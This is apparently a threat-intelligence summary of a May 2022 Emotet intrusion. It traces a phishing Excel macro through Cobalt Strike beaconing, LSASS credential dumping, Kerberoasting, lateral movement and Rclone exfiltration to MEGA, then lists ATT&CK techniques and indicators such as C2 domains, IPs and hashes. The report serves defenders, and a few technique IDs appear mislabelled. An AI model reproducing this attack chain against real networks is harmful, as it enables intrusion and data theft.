Dead or Alive? An Emotet Story

May 2022 saw an Emotet-driven intrusion that began with a phishing Excel document and culminated in a domain-wide compromise, Cobalt Strike beaconing, lateral movement, and data exfiltration via Rclone. Emotet has since resurfaced (with TrickBot support) and repeatedly tested access payloads while expanding Cobalt Strike deployments.
#Emotet #CobaltStrike

Keypoints

The intrusion started from a phishing email containing an Excel document with a malicious macro and used an xls file delivered inside a zip to gain initial access.
Emotet executed to perform basic discovery, persisted via a registry Run key, and established C2 with a Cobalt Strike beacon on the beachhead host.
Within hours, Emotet launched an email-spreader campaign while the Cobalt Strike beacon enabled network enumeration, credential dumping, and lateral movement.
Threat actors dumped LSASS, used Pass-the-Hash, and performed domain and account discovery with tools like AdFind, Invoke-ShareFinder, and Kerberoasting.
Pivoting to the Domain Controller enabled further credential access, domain admin group enumeration, and installation of additional persistence/tools (Atera/Splashtop).
Exfiltration used Rclone to upload sensitive data to MEGA.cloud, with evidence of double exfiltration from two hosts and SMB share activity observed in Zeek logs.
Despite a high-risk scenario, the case concluded with eviction by authorities before ransomware was deployed; subsequent activity suggested Emotet’s ongoing evolution with Cobalt Strike.

MITRE Techniques

[T1566.001] Phishing – The intrusion began after a user opened an Excel document and enabled macros. “Back in May, we witnessed an intrusion that started from a phishing email which included Emotet.”
[T1117] Regsvr32 – Emotet used regsvr32.exe to load hvxda.ocx after obfuscated code: “The execution is done from an Excel document using regsvr32.exe with the payload, hvxda.ocx.”
[T1105] Ingress Tool Transfer – Emotet downloaded Cobalt Strike via the loader process: “The Emotet DLL is then used to download Cobalt Strike, which is then injected into svchost and dllhost.”
[T1055.001] Dynamic-link Library Injection – Process injection observed with svchost and other processes to execute payloads: “Process injection was observed during the intrusion by both Emotet and Cobalt Strike.”
[T1059.001] PowerShell – PowerView and Invoke-ShareFinder used for network discovery: “the hands-on activity … invoked PowerView module, Invoke-Sharefinder.”
[T1135] Network Share Discovery – Network enumeration via PowerView/Invoke-ShareFinder and subsequent AdFind usage: “Invoke-ShareFinder once again, and Invoke-Kerberoast.”
[T1018] Remote System Discovery – Active discovery of remote systems during pivot: “Get-System module was also apparent via the logs.”
[T1069.002] Domain Groups – Discovery and targeting of domain groups like Domain Admins and Enterprise Admins: “net group ‘Domain Admins’ … ‘Domain Computers’.”
[T1087.002] Domain Accounts – Enumeration of domain accounts and roastable credentials: “Invoke-Kerberoast” for roastable accounts.
[T1003.001] LSASS Memory – Credential dumping via LSASS memory: “then proceeded to dump credentials from LSASS.”
[T1558.003] Kerberoasting – Kerberoast performed during lateral movement: “Invoke-Kerberoast.”
[T1021.002] SMB/Windows Admin Shares – Lateral movement by transferring a Cobalt Strike DLL over SMB and executing via a remote service: “transferring a Cobalt Strike DLL over SMB and executing via a remote service on another workstation.”
[T1570] Lateral Tool Transfer – Pivoting to domain controller and deploying tools like AdFind/Atera; batch scripts used for discovery and movement: “batch script named p.bat to ping all servers.”
[T1003.003] LSASS Dump – Extended credential access through LSASS dumping on multiple hosts.
[T1071.001] Web Protocols – Cobalt Strike beacons and Emotet C2 communications over HTTP/HTTPS: “beacon type: [ ‘HTTP’ ], server: { … }”
[T1059.001] PowerShell – Use of PS-based discovery and tool execution (PowerView/Invoke-ShareFinder) as part of the attack chain.
[T1547.001] Registry Run Keys / Startup Folder – Persistence on the beachhead via registry Run Key: “The Emotet infection on the beachhead host used a registry run key to maintain persistence.”
[T1018] Remote System Discovery – Discovery of domain relationships and trusts during domain pivot.
[T1021.001] Remote Services – Use of psexec-like technique to run remote processes on other hosts: “The Cobalt Strike jump psexec (Run service EXE on the remote host) produced a 7045 System Windows event on remote hosts.”
[T1567.002] Exfiltration to Cloud Storage – Exfil to MEGA cloud storage using Rclone: “exfiltrate data to MEGA.io cloud storage.”

Indicators of Compromise

[File] info_1805.xls – Example indicator from Indicators section: “info_1805.xls” and “1.dll” among other artifacts.
[File] 1.dll – One of the DLL payloads observed on the beachhead and across hosts.
[File] find.bat – Batch script used for AD enumeration and collection.
[File] p.bat – Batch script used to orchestrate network ping discovery.
[File] adf2b487134ffcd7999e419318dfdf8d – Sample hash listed in indicators.
[Hash] acd3d4e8f63f52eaf57467a76ca2389d – File hash example from the indicators.
[Hash] e598b9700e13f2cb1c30c6d9230152ed5716a6d6e25db702576fefeb6638005e – File hash example from the indicators.
[Domain] praachichemfood.com – Hard-coded command-and-control URL domain used by Emotet payloads.
[Domain] lopespublicidade.com – Alternate C2 domain used by the loader component.
[Domain] seasidesolutions.com – Additional C2 domain observed in macro code deobfuscated output.
[IP] 103.133.214.242 – One of the hard-coded IPs Emotet attempted to connect to.
[IP] 59.95.98.204 – Cobalt Strike C2 host observed in the IoCs with HTTP beacon configuration.
[IP] 103.8.26.17 – Another stage C2/HTTP beacon IP observed in the traffic.

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print